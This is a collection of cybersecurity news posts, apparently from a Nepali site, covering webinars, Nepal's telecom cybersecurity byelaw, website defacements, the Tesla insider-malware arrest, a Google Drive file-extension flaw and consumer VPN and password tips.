Center for Cyber Security Research and Innovation (CSRI) and Information Security Response Team Nepal (npCERT) is all set to organize an international cybersecurity webinar.
The massive involvement and advancement in the Internet have certainly made lives easier in terms of online connectivity and communications. However, we must not forget the risks that come with it.
Furthermore, there have been many incidents related to cybersecurity throughout the country and the rest of the world during the pandemic. As we have experienced the growing threat in cybersecurity in Nepal, it is important to discuss and implement strategies to tackle the challenges.
Thus, such events involving experts and organizations working in cybersecurity to come together and form a strategy is much appreciated.
Through this event, CSRI Nepal and npCERT will join hands to welcome cybersecurity experts to give their valuable insights.
The keynote topic for the event is – Cybersecurity for All: Learn How Hackers Can Access & Control Electronics Devices Remotely and How to Combat Such Cyber Attacks.
Webinar Details
Topic – International Webinar 2020: Strategies for National Cyber Security
Date – October 10, 2020
Start – 9 AM UTC+05:45
Venue – Zoom (webinar)
Keynote Speaker – Danda Bir Rawat, Ph.D., IET Fellow
Data Breach and Security has been the hottest news in the tech and digital world recently! Every company today wants to ensure the users of the maximum data security. Following the same, Facebook has recently sued two firms for carrying out illegal data scraping in its various platforms. The companies carried out data scraping on Facebook and Instagram which belongs to Facebook. Along with Facebook, the firms carried out data acquisition from several popular sites such as Twitter, Youtube, Linkedin, and Amazon.
What is Data Scraping?
It is a method used to collect/extract data from various sites and apps by using several automation tools like bots. It has become a craze in the data-driven world of today. While several scraping is carried out in an innocuous way, these tasks can take an illegal turn if not taken seriously.
Reportedly, the companies used the data collected from the unauthorized scraping for Digital Marketing purposes. Facebook claimed that it was against the privacy policies of the company.
The two firms that violated the largest Social Media’s privacy policy are Israel based company BrandTotal Limited and Delaware based company Unimania Inc. According to Facebook, the companies used Browser Extensions to scrape the data. The name of the Browser Extensions is ‘UPVoice’ and ‘Ads Feed’.
Meanwhile, Facebook has been extra careful when it comes to data security after the scandalous Cambridge Analytica incident. The legal actions taken by Facebook have dramatically increased since then.
A Snippet from Facebook Statement:
“Today, we filed a lawsuit in the US against two companies that used scraping to engage in an international data harvesting operation. These companies scraped data from Facebook, Instagram, Twitter, YouTube, LinkedIn, and Amazon, in order to sell “marketing intelligence” and other services. The actions of BrandTotal Ltd., an Israeli-based company, and Unimania Inc., incorporated in Delaware, violate our Terms of Service and we are pursuing legal action to protect our users.”
Moreover, for a detailed official statement of Facebook in this matter, visit here.
This action taken by Facebook is a welcome move in the digital world! Following the bandwagon, various companies and tech giants need to buckle up regarding their course of actions in grave issues like these. Data security and cybercrimes are at their maximum and it’s the need of the hour to consider these issues with utmost care and vigilance.
Finally, Kudos to Facebook from our team!
Meanwhile, how do you take these steps taken by Tech Companies recently? Do write down your concerns in the comment section below.
A Bangladeshi Hacker has defaced the website of GEMS School, Lalitpur for presently unknown reasons.
The defaced website displays a page with the hacker’s alias ‘Evil Attacker’. Moreover, the hacker(s) has included the link for their Facebook handle.
‘Evil Attacker’ has publicly posted some of his recent works including the defacement of Indian websites.
In fact, there is a YouTube link for a hacking tutorial in which the hacker teaches how to hack a website without any Username and Password.
As of now, the hacker hasn’t opened up about the intention behind the mass defacement. We suspect that it’s just for fun judging by Facebook posts and comments.
[Update: The website (www.gems.edu.np) has been restored.]
Can it be just for fun or is there a greater reason behind this?
Using a VPN has become a necessity when it comes to surfing the internet securely. In fact, it isn’t only about getting access to some restricted sites as most people would think. From securing online identity to preventing data theft, a good VPN can make all the difference. In this article, we take a closer look at how to use a VPN on Windows and how to choose a good one.
If you are not using an ad blocker, you will know that clicking anywhere on a torrent site might redirect you to some other website.
That’s when using a VPN can help you download your torrent safely.
However, it is important to note that not all VPN may not deliver a satisfactory experience.
How to choose the right VPN?
Choosing the right VPN can make all the difference in your experience. Moreover, you have to make sure that the VPN you go with meets your requirements.
Let’s talk about what you should look for.
Ease of use – Not all of us are tech-savvy. Fortunately, most VPNs are easy to use with the option of connecting to a server within a few clicks. However, making sure of all the features is always better.
Security – All VPNs are meant for security at some levels but let’s also take some time to think about a backup. If your connection is lost, does the VPN provide a kill switch to block any traffic?
Usage – As much as we hate to say it but all VPN does not let you do what you want. There can be certain restrictions on what content is available and in which country.
Logs – Imagine you are browsing through a private window on your browser. You open the history and it showed all the sites visited. Certainly, you wouldn’t want that with your VPN either. However, it may depend on what logs do the tool keep and if you are on board, then it shouldn’t be a worry.
Pricing – The price tag on a VPN plays a huge role in deciding whether to go for it. There are also some brilliant options at affordable rates. Make sure to check out the long term plans or any special offers.
Free vs Paid VPN: What to choose?
All great things come at a price. So does VPN. Paid VPNs are better in terms of quality of service and level of security.
Besides that, there are more features and settings to enhance your internet surfing experience. Furthermore, paid VPNs are ads-free.
Although, there are a few decent alternatives that are free and give you exactly what you need. However, free VPNs often have limitations in customer service, security, and server locations.
So, if you are serious about your online privacy and want to maintain anonymity, you should opt for a paid service.
How to use a VPN on Windows: Getting Started
Most of the time using a VPN is straightforward whether it’s on Windows, iOS, or Android. All you have to do is:
Download and install the VPN
Set up the VPN and adjust a few settings
Connect to a VPN server
That’s about it!
You can find the download button or link on an official website. Then, you can double-click the downloaded file to get started with the installation.
Image: Surfshark
When the installation is complete, open the application and wait for it to start. Some applications might start automatically after installation, depending on your Window settings.
Here comes the part that separates a free and a paid VPN!
You need to log in if you have an active subscription to the VPN. If not, there might be limited features to use for free.
Upgrading to the premium version is always an option.
To do that, you can sign up or create an account.
Some VPNs such as Surfshark offer two-factor authentication, which is always better in terms of account security.
When you have created an account and logged in, simply tap Connect or whatever the button on the screen says. If the connection is successful, VPNs usually show a ‘connected’ status.
To disconnect, simply click on the Disconnect button.
Choosing a VPN Server
By now you probably have learned how to use a VPN. However, tapping Connect would normally connect you to a default server location.
Look for a menu option that allows you to choose a server location. Some VPNs have an option to choose from the Fastest or the Nearest server.
However, you can choose from many countries. For example, Surfshark has over 1700 servers in 63+ countries. Meanwhile, ExpressVPN offers 160 server locations in 94 countries, as of now.
Talking about managing server locations, most VPNs have a feature to bookmark your favorite locations.
Connecting to these locations requires just a single tap. And, the same goes for disconnecting!
Managing VPN Settings and Features
It is important to make sure you are aware of the settings and features of your subscription. In fact, you can do much more than just change your password from the settings.
You have options such as:
Update your subscription plan
Earn by referral (depending on the service provider)
Changing the app language
Configure Auto-connect, notification, Kill Switch
Enable dark mode (not all VPNs may have this option)
Besides these, there are advanced settings that you can configure if you know your way around it. Otherwise, we recommend not to mess with the advanced settings.
Let’s also talk about some features that VPNs usually provide while we are at it.
Specifically paid versions of VPN allow users to choose which apps or sites to exclude from the VPN connection. You wouldn’t want to browse some of your favorite social media apps through a VPN.
Similarly, there are features, when enabled, can block potentially dangerous ads and malware. Some VPNs also offer real-time notification when your credentials are at risk of being hacked.
What we recommend
It’s definitely Surfshark that comes on top for me. Other VPNs such as ExpressVPN and Nord might have impressive security features but I think Surfshark comes at an affordable rate for what it offers.
The interface of this VPN service on Windows is quite clean and easy to navigate through. The feature that impressed me is the CleanWeb that blocks ads and malicious sites automatically.
There’s so much security vulnerability that you can be exposed to on the web, especially on Windows. I found that Surfshark has answers to all of that.
Now is the era of digital transformation! From smaller businesses to large enterprises, every sector is today dependent on technology. Especially when the global pandemic covid19 hit the world at the end of 2019 starting from the Chinese Province Wuhan, the dependence on technology and digital infrastructure has become quite indispensable today. In this article, we will look at the changes brought about in the digital domain during the pandemic and how it should be dealt with. The pandemic is still around with us and will stay with us for a long time as per the experts. So, let’s dive deeper into the topic by discussing Digital Risk Management that has become mandatory in today’s time and space.
First, let’s learn in detail about the concepts and definitions of digital risks, its types, and other important aspects related to it.
What is Digital Risk?
Digital risks are the actions or events that can cause damage to the computers, hardware, software, data, and information in a digital domain. Every business or organization is today susceptible to attacks and threats. Every now and then we are hearing about the hackers and cybercriminals attacking and manipulating the data and information they get their hands on.
Types of Digital Risk:
Cybersecurity Risk
Compliance RISK
Workforce Risk
Third-party risk
Data Privacy Risk
Resilience Risk
Automation Risk
Digital Risk Management:
Digital Risk management is an essential part of business management. Managing digital risk means understanding the loopholes in the business or organization and carrying out the necessary actions to minimize its effect in the business.
Steps of digital risk management:
Identifying critical/vulnerable business assets: Firstly, an organization needs to know what are the assets(data, information, etc.) that are vulnerable. This paves the way to carry out the further steps.
Identifying potential threats: After knowing the vulnerable aspects of the business, it is important to analyses what possible threats and risks might affect those vulnerable aspects.
Monitoring for unwanted exposure: In this step, the organization/business should carry out various steps to know whether the data/business assets are exposed to the outside unwanted world. If they are exposed and attack prone, final actions need to be taken.
Taking necessary actions: This is the final step in digital risk management. The necessary steps to protect the data and information should be taken in this step. The companies should carry out various mitigating measures. The mitigating measures include:
Tactical Mitigations
Operational Mitigations
Strategic Mitigations
Now, let’s talk about the current pandemic scenario and how digital risk management needs to be strengthened even more today.
Pandemic and Digital Risk:
After the pandemic hit globally, all the organizations and enterprises have started to rely heavily on Technology. It’s great that technology has been incorporated in various aspects of the society, but the rampant adoption without any care for risk and threat assessment has made the organizations and companies even more vulnerable. Time and again, we are hearing various hackers and attackers more pervasive than ever before.
This has definitely shifted the risk to the digital domain today. It is a great task for the organization to manage data security and other various threats.
Industries in risk:
Banking/Financial Institutions
Healthcare
Manufacturing
Pharmaceutical sectors
Educational Institutions
The listed industries and much are lacking proper security today. When it comes to the Pharmaceutical industries, attacks could be more rampant considering the worldwide craze and competition for developing the correct vaccine for the virus.
Let’s consider an example of the banking sector which is currently among the most vulnerable businesses.
Online banking and electronic transactions have evolved over the months today. The shift has accelerated at a very fast pace due to the pandemic. But are these things being done correctly? The only goal when the pandemic hit the banking sector was to continue their business. Due to this necessity, proper risk assessment and mitigating measures aren’t done. They are just riding the bandwagon. This can definitely have a negative impact. For risk management, they need to change the framework.
How to make digital systems resilient in the times of pandemic?
Organizations should be aware that attacks can happen at any time.
They need to plan accordingly for the unexpected.
End users are being attacked in their homes. They need to take care of that. Phishing attacks are increasing.
Organizations should adopt digital risk management. During the unprecedented times following steps have become a necessity. Let’s look at them in detail.
How to identify digital risk?
Perform a routine risk assessment to understand where the company/organization stand
Implement new technology considering the risk management
The companies should take care of the data privacy of employees.
Addressing the employees’ concerns because they are at risk by working remotely.
Safeguard the overall cybersecurity ecosystem.
Today the workplace isn’t just centrally located in a building; today everyone is working from home. So, the companies need to evaluate the risks in the employees’ network too.
What steps do the organizations need to take?
Companies should provide their own laptops and pc with security parameters
The work from home employees should be trained which has been neglected from time unknown.
Cybersecurity awareness to employees.
The employees should be made aware of the potential threats by providing then Phishing simulations.
What lies ahead?
It seems like the pandemic is still going to be among us for a fairly long time. Meanwhile, work from home has become a culture and remote employment is definitely going to continue in the future even after the covid19 pandemic starts to fade away. So, it is an utmost need of today to think about the digital risks and carry out the necessary evaluations and assessments in full swing.
The heavily digitally empowered industries today are the more vulnerable ones and they should come up with the best ideas and measures to ensure that security is maintained. Similarly, cybersecurity or more precisely the digital community as a whole needs to come together in these dire times to find out the best solutions to the problems at hand.
Meanwhile, let us know what needs to be done to ensure digital security in the current scenario in the comments below.
Suman Thapaliya
Author: SumanThapaliya
Head of IT Department
Texas College of Management and IT
Did you know that your browser has a built-in password generating feature? Well, data security has become a major challenge across the globe. In this article, we will look at how to generate a strong password through browsers such as Mozilla Firefox and Google Chrome.
First, let us give you an idea of why you need a strong and secure password.
Most of us have a habit of using the same password across all of our accounts. That may be convenient for remembering the password but that can also become a potential threat.
How?
What if somebody gets through to one of your accounts and steals your password? They will have access to all of your accounts.
This is a very bad practice in terms of data and information security online.
What exactly is a Strong Password?
There’s a basic measure of passwords. A strong password is the one that includes a mix of letters (uppercase and lowercase), numbers, and characters. Length is another parameter while measuring your password strength.
Furthermore, it is not recommended to use your personal info in the password, for instance, your first name or mobile number.
While we are at it, let’s also talk about remembering the password. Have you ever forgotten your password, be it for Gmail or Facebook, or any account that you use?
Honestly, we have all been there.
However, our browsers also have a pocket that stores all of your login information including password. But only if you allow it.
How to Generate Strong Password in Google Chrome?
In case you didn’t know, Google Chrome has a password store and synchronization feature. Similarly, it has a built-in password manager that allows you to save and view your passwords.
You can also use it to generate strong passwords when signing up for any website or web app.
In fact, you don’t have to do anything!
Here’s how to create and use a secure and strong password in Google Chrome:
Visit any website that you want to create an account in.
Go to the Sign-Up form and fill the required information.
Click on the password field and a password suggestion will be prompted.
4. Tap or click on the suggested password to use it. You can choose to copy it and store it in a safe location.
However, when you select the suggested password, Google Chrome automatically saves it for you. It syncs the password with your Google account.
Disclaimer: Password Syncing is a default Chrome feature. However, you can choose to enable or disable it from Chrome’s settings.
When you log in to the Chrome browser on another device, you can find the password saved in Chrome’s settings.
Or, you can access your saved passwords by entering: chrome://settings/passwords.
How to Generate Strong Password in Firefox?
Firefox has a similar feature for generating and saving passwords. The password manager in Firefox is called Firefox Lockwise.
The process for generating a strong password in Firefox is the same as in Google Chrome. So, we are not going to waste your time by repeating the process since it is very simple.
But we will show you how to allow Firefox to save the entered password.
When you sign in or sign up into a new account, Firefox will prompt a message next to the address bar.
By clicking on Update, you can allow Firefox to save your password so that you won’t have to remember or enter it again.
To access Firefox Lockwise, click on the hamburger menu on the top-right corner of your browser. Then, click on Logins and Passwords.
Or, you can go to enter about: logins in the address bar.
Recently, Nepal Telecommunications Authority (NTA) issued the Cyber Security Byelaw, 2077 (2020). The objective of this byelaw was to meet cybersecurity standards and show best practices to protect IT infrastructure from various malicious attacks and threats.
Similarly, this document is expected to build trust and confidence of users towards using ICT technology and services of NTA.
On 11th September 2020, the Information Security Response Team Nepal (npCert) and Center For Cyber Security Research and Innovation (CSRI) jointly hosted an open discussion on the topic “Multi Stakeholders Discussion on NTA Cyber Security Byelaw, 2077.
Suresh Bhandari, Program Coordinator and Director at npCERT welcomed panelists and participants with his opening remarks.
The panelists for the discussion were:
Bijay Kumar Roy – Director at Monitoring Division, NTA
Shubha Kayastha – Co-founder/Executive Director at Body & Data
Binay Bohora – MD at Vianet
Binita Shrestha – Manager at NTC
Yasmine Bhattarai – Unit Head at Ncell
The panel discussion was moderated by Chiranjibi Adhikari, President of npCERT.
Discussions, Questions, and Way Forward
Bijay Kumar Roy thanked npCERT for taking the initiation of conducting a discussion on the recently issued byelaw since it is important to clear any confusion.
He went on to explain the role of NTA to bridge the gap due to the digital divide in the country.
Vivek Rana, npCERT advisor and keynote speaker for the discussion gave an insight into the byelaw and its importance through a presentation.
One of the takeaways from his presentation was the need to keep IT and security separate. Since IT creates value and cybersecurity protects value, Vivek Rana suggests not merging these terms.
“Defending is attacking in reverse,” he finished his presentation by reflecting on the importance of defense.
Subha Kayastha was the first to raise a question regarding the byelaw. She asked what will govern other service providers if the byelaw is only for licensees.
Picking on a point from the byelaw, she said that anonymizing data is not enough, it can still be used against the person making it a potential threat.
On the other hand, Panelist Binay Bohra feels that the byelaw has become a bit granular. Moreover, he said that It should’ve defined a perimeter and allowed ISPs to carry out its operations based on that.
Compliance requires time
Panelist Binita Shrestha said that NTC will be working to meet these compliances by breaking them down in phases. “However, we will need some time and prerequisites by coordinating with NTA”, she said.
Likewise, Yasmine Bhattarai explained that it took aggressive meetings and discussions with stakeholders to prepare this document. She also agrees that this byelaw needs more time and work to achieve full compliance. She stressed on building a road map by studying the organization structure to comply quickly and effectively.
Panelist Bijay Kumar Roy seemed ecstatic about how fast this byelaw is gaining momentum and support from the service providers. Since he is a leading person behind this byelaw, he said that discussing and debating the points will only help to improve it.
“I urge everyone to try and comply with it so that we can gradually make revisions if needed”, he said.
In case you missed the discussion, follow this link.
Visa, the global payments technology company, launched a new roadmap that sets the direction for payment security in Nepal for 2021and beyond. Today, as people prefer making payments through devices like smartphones and laptops and with a number of new users entering the payments ecosystem, Visa’s undertaking is both timely and relevant in helping Nepal embrace digital payments with confidence.
Launching the Visa Future of Security Roadmap, Visa’s Head of Risk for the Asia Pacific, Joe Cunningham said, “The global pandemic has driven more consumers and businesses to adopt digital commerce. As people try digital payments for the first time, whether it is paying for online purchases or paying with a contactless card at a store, it is important that the experience is convenient, fast, and secure. Payment security is Visa’s top priority and having a set of common goals for the industry is crucial to helping build long-term trust in digital payments.
“Visa’s Future of Security Roadmap for Nepal will elevate the local industry to meet global standards and best practices. We appreciate the collaboration with all of our partners and believe that our shared vision will promote the greater use of digital payments in the coming years.”
Globally, Visa has successfully prevented $25 billion in annual fraud by using artificial intelligence (AI), making the global payment ecosystem safer for retailers and consumers. It has kept global fraud rates at historic lows—less than 0.1 percent—through a multi-layered approach of investing in human intelligence and technology; empowering consumers and clients with tools, resources, and control to manage risk; and setting governance processes to help businesses and regulators stay nimble.
Commenting on the launch, TR Ramachandran, Group Country Manager, India, and South Asia, Visa said, “Security of consumer and payment data has always been the highest priority for Visa. Building this trust at a time when new consumers and businesses are going digital is a shared responsibility between payment networks, consumers, banks, and the government.
New technology brings new ways to pay as well as new and unique risks, and to stay ahead of fraud, we need to work together and invest in security the same way we invest in innovations and consumer experience. We are proud to launch the Nepal Future of Security Roadmap as the groundwork to achieve this balance between security and experience.”
While Visa’s Roadmap focuses on a number of initiatives which will enable security to evolve at the same pace as the technologies – like EMV® 3-D Secure and tokenization – changing the way we pay, the core tenets of the roadmap include:
Devalue data by removing sensitive payment data from the ecosystem and making stolen account details useless
Protect data by implementing safeguards to protect personal data as well as account details
Harness data by identifying potential fraud before it occurs and increase confidence in approving good transactions
Empower everyone, including account holders and merchants, to play an active role in securing payments
Visa works with industry stakeholders including financial institutions, merchants, policymakers, law enforcement, and accountholders to secure payments. The Visa Future of Security Roadmap is the product of comprehensive consultations and collaboration, making it an authoritative document on Nepal payment security. Visa is delivering roadmaps around the world to ensure the security of the global commerce ecosystem, as well as working with Nepalindustry bodies to align security initiatives.
In today’s digital era, owning data and information not only accumulates to technological but also financial gain. The terms cybersecurity, cyber law, and hacking are not new in today’s world. Many people are well-tuned to the digital world. From paying bills to phone calls or to store important documents electronically, digital platforms have become a much convenient option. With the platform gaining importance, threats induced by cyber-crime have also affected a diverse number of public and private organizations. The servers and data centers of such organizations are much prone to cyber-attacks.
Any individual or organization could be an easy target for hackers. Therefore, it has become more important to protect the information system and infrastructure from hackers by implementing cybersecurity best practices and enforcing cybersecurity laws. The Government of Nepal has also implemented many cyber laws such as the Electronic Transaction Act, 2063. And, there are other Cyber related acts and laws, such as National Cyber Security Policy 2016, and IT Bill 2018 are in process of amendment. Recently, Nepal Telecommunications Authority (NTA) launched Cyber Security Bylaw, 2077 (2020) meeting cybersecurity standards and by showing best practices to protect IT infrastructure from various malicious attacks and threats to building trust and confidence of users towards using ICT technology and services of NTA.
This week on 11th September 2020 the Information Security Response Team Nepal (npCert) and Center For Cyber Security Research and Innovation (CSRI) Jointly hosted an open discussion on the topic “Multi Stakeholders Discussion on NTA Cyber Security Byelaw, 2077”.
Nepal Telecommunications Authority (NTA) has issued Cyber Security ByeLaw 2077, requiring service providers to conduct mandatory security audits.
The new regulations make mobile and internet service providers responsible for cybersecurity. Experts have praised the efforts of NTA to issue the regulations, especially when cyber threats are on an increasing trend.
The ByeLaw provides that service providers must protect customers’ data. Likewise, they should inform the NTA in case of a cyberattack and prevent it.
Director of NTA, Min Prasad Aryal says that these regulations help to tackle the increasing cyber threats resulted due to the rise in online usage. “Schools, businesses, and other activities have already shifted online and with the increase in internet usage, we can’t ignore the possibilities of misuse. Therefore, NTA issued this ByeLaw to prevent misuse, criminal, and fraudulent activities,” says Director Aryal.
He further adds that the ByeLaw will assist all the mobile and internet service providers licensed by the NTA to make proper policies, manage the workforce and business plans.
Moreover, the bye-law contains items to be checked in an IS Audit, which the service providers will have to report to the NTA.
The Cyber Security ByeLaw covers General Security Standards and Practice, Data Security and Privacy, Information Systems Audit, Cloud Security, Infrastructure and Network Security, Core Security Systems, Application Security, Incident Response, In-House Security Issues including Capacity Building.
“The primary objective of these regulations is to protect consumers’ privacy in compliance with international standards and practice. Also, we hope that it will strengthen the system architecture preventing any unwanted breach of data,” adds Director Aryal.
Furthermore, he said that action would be taken against the companies that did not implement the new regulations as per the Telecommunications Act.
The new bye-law clearly points towards NTA’s growing concern for security. We hope that these regulations strengthen the situation of cybersecurity in Nepal.
What do you think about the new cybersecurity regulations?
Center For Cyber Security Research and Innovation (CSRI) and Information Security Response Team Nepal (npCert) in association with Nepal Telecommunications Authority, CAN Federation, and CSIT Association of Nepal has successfully hosted the Webinar titled ‘Cyber Security Context in Nepal’.
The webinar covered discussions on the past, present, and future context of cybersecurity in Nepal with a major focus to shed light on the way forward in this domain.
The webinar started off with opening remarks by the President of CSRI, Prof. Dr. Subarna Shakya. Similarly, the Immediate Past President of CSRI and President of npCERT, Chiranjibi Adhikari welcomed the esteemed organizers, resource person, and all the participants.
Speaker/Resource Person for the Webinar
Mr. Narayan Koirala was the resource person/speaker for this event. He is a pioneer in the cybersecurity field and has been actively working to uplift the quality and standard of cybersecurity in Nepal.
By qualification and profession, Mr. Koirala is a Software Engineer and Cyber Defense Enthusiast. He is also the Founder/Director of Eminence Ways Pvt. Ltd., a dedicated Cybersecurity company headquartered in Nepal.
He started his presentation on the Past / Present / Future context of cybersecurity in Nepal by introducing the pillars of cybersecurity – People, Process, and Technology.
In fact, he managed to give profound information in a way that was easily understandable by both technical and non-technical audiences in the webinar.
Narayan Koirala explained the rising trend of cybersecurity threats with the advancement in technology. With people compelled to use technology daily in personal life due to the pandemic, it has increased the areas of attack for threat actors.
His presentation highlighted the areas where we lack, as users, to secure our data and privacy. On the other hand, the poor execution of the cybersecurity process and policy has not made it convenient for companies to invest in the domain.
There are major cyber threats surrounding us that we need to be both aware of and prepared for. Some of them are – targeted ransomware attacks, mobile malware. API level attacks, misinformation, deepfakes, and several remote working security threats.
The Way Forward
Mr. Koirala also gave his insights and opinions on the way forward in the cyber defense realm. Directives, guidelines, and policies always come first. He suggests that the governance in cybersecurity should be strengthened. Likewise, it is equally important to enhance incident response capabilities among other strategies.
Finally, the resource person Narayan Koirala warned about the increasing threat to people (users). He predicts that the prime target of cyberattacks will be the users. Therefore, educating and training them is crucial to safeguarding both personal and enterprise security.
Center For Cyber Security Research and Innovation (CSRI) and Information Security Response Team Nepal (npCert) in association with Nepal Telecommunications Authority and CAN Federation is all set to host the Cyber Security Context in Nepal (Past / Present/way forward on September 1st, 2020 (Tuesday) from 3 PM to 5 PM.
Zoom ID: 93123363895
Password: 482062
Speaker Details:
Mr. Narayan Koirala is a Software Engineer and Cyber Defense Enthusiast. Heis the Founder/ Director of Eminence Ways Pvt. Ltd., a dedicated Cybersecurity Company headquartered in Nepal. He is a pioneer in the field of Cyber Security and has been continuously working to uplift the field of IT security in Nepal.
Mr. Koirala has extensive experience in resolving Cyber Security issues of Major Financial Institutions, Government Bodies, and Private Companies, both at the national and international levels. During his career spanning more than a decade in cybersecurity, Mr. Koirala has witnessed how an organization’s less prioritized data security could face severe problems in the long run. His company, employing more than 35 professionals, has been consistently working to identify IT vulnerabilities and has helped organizations get secured by assisting in minimizing IT Threats.
Mr. Koirala also engages around uplifting various cybersecurity, tech, entrepreneur communities in Nepal. He mostly encourages people to practice Cyber Hygiene, secures their personal tech asset usage which he believes will eventually lead to secure their respective organization. He also counsels’ people from their earlier school days to be ethical and practice white hat culture.
Mr. Koirala has been featured in numerous National and International Media and shared his thoughts about rising cybercrime and prevention in various conferences/ events. His articles about Cyber Hygiene and Data Security in the fast-paced technological advancement are being followed by many individuals and organizations.
Mr. Koirala holds a Bachelor’s degree in Software Engineering along with an MBA. He is also a certified ISO 27001:2013 Auditor and a certified CISCO CCNA CyberOps professional. Besides, he is associated with the Nepalese Young Entrepreneurs’ Forum (NYEF), Lions Club International, and CAN Federation.
A group of Indian hackers called Indian Cyber Troops have defaced the website of Nepal Press Union.
The website prompts a dialogue box saying ‘Justice for Nirmala Panta’.
Earlier the same group of hackers had defaced the website of the Supreme Court Bar Association for the same reason.
It looks like the Indian Cyber Troops have taken interest in the unsolved case of Nirmala Panta. The defaced website shows a picture of Nirmala Panta, who was raped and murdered.
The website also says “750+ days Still Nepal Government is silent”. It is clear that the objective of this defacing is to bring attention to the delay in this case and seeking justice for Nirmala Panta.
The website of the Public Procurement Monitoring Office (PPMO), bolpatra.gov.np, was hacked while evaluating the bids for the disputed railway construction contract.
According to a notice issued by the office, they were unable to download documents due to technical problems in their system.
Thus, the office has postponed the evaluation process for the bids opened from Shrawan 24 to 28.
Furthermore, data recovery is still uncertain, which means they might need to open another tender.
The office has even asked to postpone all the bidding process until further notice. In fact, the office has also asked to upload the documents again in case there was a new document upload by inviting new bids within that period and the last date was yet to come.
Also, the office has stated that the system manager will facilitate the submission of such application forms. And, the manager will be responsible to fix the date of opening if the affected public body requests.
Among the affected are also bidders due to this issue. Bidders who have registered in the bidding system within the 5 days period have to update the registration. Moreover, in the case of the final bid submission period, they have to re-upload even if the bidder has already submitted it.
Image: bolpatra.gov.np (Snapshot)
Due to the technical issue on the system, the office has fixed the last date for submission or opening of the bidding from 13th to 18th of September.
In order to eliminate data security risk, such bidding has been arranged on the same portal through the website of the Prime Minister’s Office through electronic means.
Ironically, this facility couldn’t prevent a ‘technical issue’ on the website.
Technical Issue in a Controversial Contract
The contract for the construction of the railway trackbed was opened on the 28th. About 120 contractors including JV had participated in the bidding.
For the evaluation of all these proposals, the evaluators of the Railway Department tried to download the proposals on bolpatra.com. However, they came to realize that they could not download the documents due to a technical problem.
After receiving complaints, the monitoring office asked to postpone the bidding process until the office recovers data. Accordingly, the Railway department has postponed the technical evaluation process.
The PPMO claimed that an unknown issue caused the technical problem on the website. However, a technician at the office said that the internal problem is a cyberattack. Also, the team is trying to recover the lost data, but with failed attempts as of now.
If recovery of data fails, this process will have to start from the beginning.
Legal Dispute Regarding the Contract
The railway contract is one of the disputed contracts. In fact, the issue is still pending in court.
There were also doubts regarding the legal aspects to call for contracts to enable only 18 companies to be technically competent and to create an environment of competition.
That’s why this case had reached the Patan High Court to stop the contract process for the construction of the trackbed. However, the court refused to issue an interim order and thus, the bidding process had resumed.
Meanwhile, the Development and Technology Committee of the Parliament had also instructed the department and the Ministry of Physical Infrastructure not to proceed with the process until the resolution of the land acquisition dispute and other issues of the railway.
The contract process went ahead despite the directives of the committee. Therefore, the committee had again sent a letter to the ministry and the department reminding them of the old decision.
The railway department itself had signaled to back down due to fears of railway construction irregularities even in public.
However, as the process progressed, it was not possible without the intervention of the upper body. The department has indicated that it will withdraw after the compensation dispute was not resolved and there was a four-sided dispute in the tender.
In the same situation, there is a problem with the website now.
MP Rajendra Lingden said that the contract process was wrong in the first place. So, it was better to postpone it. However, he said it is not good to have technical issues because it could lead to losing confidence in the system.
Earnest employee saves the day and prevents a major cyber attack at Tesla.
A Tesla employee turned down an offer worth $1 Million and helped the FBI arrest a conspirator. This prevented a huge cyberattack on the tech giant Tesla.
The Story, as we know it
A conspirator by the name of Egor Igorevich Kriuchkov contacted a Russian-speaking, non-US citizen Tesla employee back on July 16. The employee was stationed at Tesla’s Gigafactory Nevada.
The conversation took place in WhatsApp under the pretext of meeting the conspirator in person. Soon, the meeting was held at a hotel in Reno, Nevada on August 1.
Kriuchkov initially befriended the employee and started hanging out with his associates. He was simply building enough trust to make an offer.
Finally, Kriuchkov told the Tesla employee about a ‘Special Project’ that involved a Tesla insider to install malware on the company’s computer system. He asked the employee to do a manual installation once he received the malware.
In fact, the conspirator offered the employee a whopping $1 Million payout to carry out this cybercrime.
What could the malware do?
Well, the malware would allow the conspirators to carry out DDoS attacks on Tesla’s network. Moreover, it would give them access to private and confidential information on the company’s server.
They would have probably withheld the information for a ransom.
Earnest Hero Turns Down a Tempting Offer
The Tesla employee turned down the offer and refused to help the cyber conspirators. In fact, the employee shared this piece of information with its employer, which in turn informed the FBI.
Soon, the FBI looked into this case by wiring the Tesla employee and keeping track of Kruichkov’s movement.
On August 21, Kriuchkov informed the employee that there had been a change of plans and it would be postponed by a few days. He guaranteed to pay through Bitcoins.
The conspirator went away by handing over a mobile phone, which he asked to keep on Airplane mode until further confrontation.
The FBI followed him from Reno to Los Angeles (LA) and suspected a possible escape from the country. They eventually arrested Kruichkovon August 22 and charged him under “Conspiracy to Intentionally Cause Damage to a Protected Computer.”
Tesla Employee Received Praises
Tesla CEO Elon Musk took on to twitter to appreciate the earnest employee. He also accepted that they dodged a serious bullet.
This straight-up sounds like a plot of a crime movie. However, this also means that employees should remain vigilant about such threats.
Likewise, companies need to rule out such insider threats as such conspirators are lurking to exploit employees at all costs.
Let’s try putting ourselves in the employee’s shoes. What would we have done if we were offered such a huge sum?
This latest security issue on Google Drive resides in the manage versions functionality. In case you are not familiar with it, this feature allows file owners to upload the latest version of the file.
You would think that Google Drive allows users to update an older version of the file with a new version. Yes, it’s true so far, but the shocking thing is that it even allows uploading a version with a different extension.
For example, you have uploaded your thesis file with the filename ‘thesis.pdf,’ which means it is a PDF file having a .pdf extension.
The security flaw allows you to upload a newer version of the file, but you can even upload a file ‘thesis.pdf.exe’ easily.
What does this mean?
This means that when you share this file with someone (or send a mail), they might still be able to open the pdf file from their browser. However, hitting the download button will download the ‘exe’ version of the file, which may be corrupt or malicious.
Here’s a demo video:
As you can see, Google didn’t even force the same extension while changing the file version.
The Hacker News even claims that Google was aware of this issue but left it unpatched.
How Can Malware Hackers Exploit Google Drive Vulnerability?
Spear-phishing scams typically attempt to trick users into giving up their credentials, such as account information, password, and so on.
If users click on a malicious link or attachment, then the attackers will have access to all the credentials.
This Google Drive security issue is no different. The inability to keep the extension consistent can allow threat actors to upload a file containing malware.
Users will unknowingly download the malware that can give attackers access to the user’s system and credentials. What’s even worse is that Google Chrome implicitly trusts the files downloaded from Google Drive.
Meanwhile, the demo video shows that other antivirus software or file-sharing platforms can detect the file as malicious.
Have you noticed this issue before? Are cloud services becoming more vulnerable?
Sometimes we are unable to comprehend the advancement the world is making in terms of digital transformation. And those moments when we choose to ignore the threats that come with it, it is often too late. A report from Check Point Research stated a phishing attack that exploited Google Cloud.
Yes! The clouds may not be the safest place, after all.
